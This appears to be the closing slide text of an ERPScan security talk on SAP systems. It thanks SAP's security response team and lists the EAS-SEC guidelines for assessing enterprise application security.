I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations.
PS:
• EAS-SEC: a resource which combines
  – Guidelines for assessing enterprise application security
  – Guidelines for assessing custom code
  – Surveys about enterprise application security
Future work